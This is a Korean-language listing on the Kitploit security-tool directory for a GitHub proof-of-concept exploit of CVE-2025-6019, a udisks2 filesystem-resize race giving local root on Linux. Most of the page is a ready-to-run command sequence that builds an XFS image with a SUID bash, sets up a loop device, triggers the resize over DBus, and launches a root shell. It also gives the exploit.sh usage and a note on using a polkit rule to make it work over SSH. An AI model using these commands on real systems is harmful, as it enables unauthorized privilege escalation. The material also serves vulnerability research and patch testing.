Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-6019-exploit — 익스플로잇 | Kitploit
도구/GitHubGitHub/and-oss/cve-2025-6019-exploit
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHuband-oss/cve-2025-6019-exploit

CVE-2025-6019-exploit

익스플로잇

저장소 보기
431년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-6019: UDisks2 파일시스템 크기 조정을 통한 권한 상승 익스플로잇

취약점 세부 정보

  • CVE ID: CVE-2025-6019
  • 영향: 로컬 권한 상승 (LPE)
  • 영향을 받는 시스템: 취약한 udisks2 버전이 있는 Linux 시스템
  • 메커니즘: 파일시스템 크기 조정 중 경쟁 조건으로 인해 전역 쓰기 가능한 임시 디렉터리 내 SUID 바이너리에 접근 가능
  • 주요 구성 요소:
    • udisks2 서비스 (DBus 인터페이스)
    • org.freedesktop.UDisks2.Filesystem.Resize 메서드
    • /tmp/blockdev* 아래의 임시 마운트 지점

익스플로잇 워크플로

1. 악성 파일시스템 이미지 준비 (공격자)

root@kitploit:~
dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount
chmod 04555 ./xfs.mount/bash  # SUID 비트 설정
umount ./xfs.mount 

2. 익스플로잇 트리거 (피해자 시스템)

root@kitploit:~
# 시스템 기능 확인
gdbus call --system --dest org.freedesktop.login1 \
  --object-path /org/freedesktop/login1 \
  --method org.freedesktop.login1.Manager.CanReboot

# 간섭 제거
killall -KILL gvfs-udisks2-volume-monitor

# 루프 장치 설정
udisksctl loop-setup --file ./xfs.image --no-user-interaction

# 백그라운드 감시자 (SUID 바이너리가 나타나면 실행)
while true; do 
  /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break
done 2>/dev/null &

# DBus를 통해 취약점 트리거
gdbus call --system --dest org.freedesktop.UDisks2 \
  --object-path /org/freedesktop/UDisks2/block_devices/loop0 \
  --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

3. 루트 액세스 획득

root@kitploit:~
/tmp/blockdev*/bash -p  # 권한 있는 셸 실행
id
# uid=65534(nobody) gid=65534(nobody) euid=0(root)

중요!

익스플로잇은 logind 세션에서만 작동합니다!

  • 스크립트는 Active=yes이고 Remote=no인 logind 세션(예: tty1)에서 실행되어야 합니다.
  • SSH / pts/* / reverse-shell 세션에서 시작하면 udisksctl loop-setup --no-user-interaction 호출이 polkit에 의해 거부되므로 PoC가 "Failed to create loop device" 오류와 함께 종료됩니다.

참고:

  • SSH를 통해 익스플로잇을 사용하려면 임시 polkit 규칙을 추가해야 합니다.

익스플로잇 사용 방법

suid 이미지 생성

root@kitploit:~
$ sudo bash exploit.sh create 

시스템 익스플로잇

root@kitploit:~
$ bash exploit.sh exploit 

POC 동영상

poc

도구 다운로드